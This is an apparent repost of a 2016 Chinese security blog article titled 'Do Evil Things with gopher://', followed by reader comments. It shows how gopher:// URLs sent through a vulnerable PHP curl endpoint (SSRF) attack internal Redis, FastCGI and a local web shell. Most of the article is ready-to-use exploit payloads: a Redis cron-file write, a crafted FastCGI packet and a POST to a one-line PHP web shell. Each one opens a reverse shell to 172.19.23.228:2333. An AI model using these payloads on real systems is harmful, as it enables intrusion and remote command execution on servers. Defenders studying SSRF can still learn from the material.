关闭

Do Evil Things with gopher:// , Ricter · 2016/06/01 9:32

1107人阅读 评论(0) 收藏 举报
分类:

0x00 前言


Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。当然现在 Gopher 协议已经慢慢淡出历史。但是经过部分测试,发现阿里云的 libcurl 还是支持 Gopher 协议的,在实际环境中可能会有更多。

Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。

最大化利用 SSRF,将一个鸡肋漏洞玩的的淋漓尽致的例子也有,比如:WooYun-2016-213982:bilibili某分站从信息泄露到ssrf再到命令执行

0x01 环境


  • IP: 172.19.23.218
  • OS: CentOS 6

根目录下 1.php 内容为:

1
2
3
4
5
6
7
8
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
?>

0x02 攻击内网 Redis


Redis 任意文件写入现在已经十分受到广大渗透狗们的欢迎,一般内网中会存在 root 权限运行的 Redis 服务,利用 Gopher 协议攻击内网中的 Redis,这无疑可以隔山打牛,直杀内网。

首先了解一下通常攻击 Redis 的命令,然后转化为 Gopher 可用的协议。常见的 exp 是这样的:

1
2
3
4
5
redis-cli -h $1 flushall
echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
redis-cli -h $1 config set dir /var/spool/cron/
redis-cli -h $1 config set dbfilename root
redis-cli -h $1 save

利用这个脚本攻击自身并抓包得到数据流:

改成适配于 Gopher 协议的 URL:

1
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

攻击:

0x03 攻击 FastCGI


一般来说 FastCGI 都是绑定在 127.0.0.1 端口上的,但是利用 Gopher+SSRF 可以完美攻击 FastCGI 执行任意命令。

首先构造 exp:

构造 Gopher 协议的 URL:

1
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00

攻击:

0x04 攻击内网 Vulnerability Web


Gopher 可以模仿 POST 请求,故探测内网的时候不仅可以利用 GET 形式的 PoC(经典的 Struts2),还可以使用 POST 形式的 PoC。
一个只能 127.0.0.1 访问的 exp.php,内容为:

1
<?php system($_POST[e]);?> 

利用方式:

1
2
3
4
5
6
7
8
POST /exp.php HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.43.0
Accept: */*
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
 
e=bash -i >%26 /dev/tcp/172.19.23.228/2333 0>%261

构造 Gopher 协议的 URL:

1
gopher://127.0.0.1:80/_POST /exp.php HTTP/1.1%0d%0aHost: 127.0.0.1%0d%0aUser-Agent: curl/7.43.0%0d%0aAccept: */*%0d%0aContent-Length: 49%0d%0aContent-Type: application/x-www-form-urlencoded%0d%0a%0d%0ae=bash -i >%2526 /dev/tcp/172.19.23.228/2333 0>%25261null

攻击:

0x05 以上


Gopher + SSRF 组合拳还有更多的姿势等待挖掘,水平有限,抛砖引玉。

0x06 参考


©乌云知识库版权所有 未经许可 禁止转载


30
firexp 2016-06-01 18:19:37

不错,可以发post请求

30
牛肉包子 2016-06-01 16:50:07

java1.6 xxe中可以用gopher协议列目录

30
L.N. 2016-06-01 15:23:53

看评论,觉得blackhat和乌云峰会都“好尴尬呀”

30
mickey 2016-06-01 14:27:22

学习了。。赞

30
猫猫侠 2016-06-01 13:49:52

@erevus b站的洞修好了吗?还不去反怼一下猪猪侠啊

30
erevus 2016-06-01 12:49:38

你这都讲完了 让乌云峰会猪猪侠怎么办

30
von 2016-06-01 12:20:19

仰视dalao

30
scanf 2016-06-01 12:08:47

赶紧进来点个赞

30
cf_hb 2016-06-01 11:18:15

学习了

30
RAyH4c 2016-06-01 11:15:46

这个确实危害严重,今年blackhat那个ffmpeg ssrf的议题应该是讲类似的。

30
Evi1cg 2016-06-01 10:01:18

赶紧进来点个赞

30
Sai、 2016-06-01 09:39:20

挺有意思,学习了

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:577537次
    • 积分:6220
    • 等级:
    • 排名:第4402名
    • 原创:22篇
    • 转载:756篇
    • 译文:2篇
    • 评论:21条
    最新评论